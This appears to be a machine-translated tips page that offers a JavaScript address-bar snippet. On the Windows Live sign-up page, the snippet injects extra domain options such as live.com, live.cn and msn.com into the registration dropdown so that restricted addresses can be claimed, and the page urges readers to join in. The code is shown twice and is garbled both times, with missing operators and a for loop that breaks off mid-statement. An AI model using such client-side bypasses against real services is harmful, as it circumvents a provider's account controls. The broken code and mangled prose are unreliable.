Windows Live’s @live.com domain name registration vulnerability exploit code_javascript skills

Another @live.com domain name registration vulnerability of Windows Live has been discovered. Now we can add the @live.com address to the registration interface of Windows Live through a simple piece of JS code. Surprisingly, it is forced in The address can be successfully registered to the account! This is another excellent opportunity, everyone come and join us!

Update: Update the code to provide more domain names, including live.cn
The method is simple:

1. Enter this page: http://get.live.com/getlive/overview
2. Click the "Register Now" button
3. Paste it in the address bar Code in the following file and press Enter:

Copy the code The code is as follows:

javascript: function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r (d="live.");r(a = new Array("hotmail.com","hotmail.co.uk","msn.com",d "com",d "be",d "co. uk",d "de",d "fr",d "it",d "nl",d "cn")); for (i=0;i

After analysis:

Copy code The code is as follows:

javascript:
function r(q){}
function s(q){e[q] = new Option(a[q],a [q])};
r(e = document.getElementById("idomain").options);
r(d="live.");
r(a = new Array("hotmail .com","hotmail.co.uk","msn.com",d "com",d "be",d "co.uk",d "de",d "fr",d "it", d "nl",d "cn"));
for (i=0;i s(i )
}
alert("Success - additional domains added!");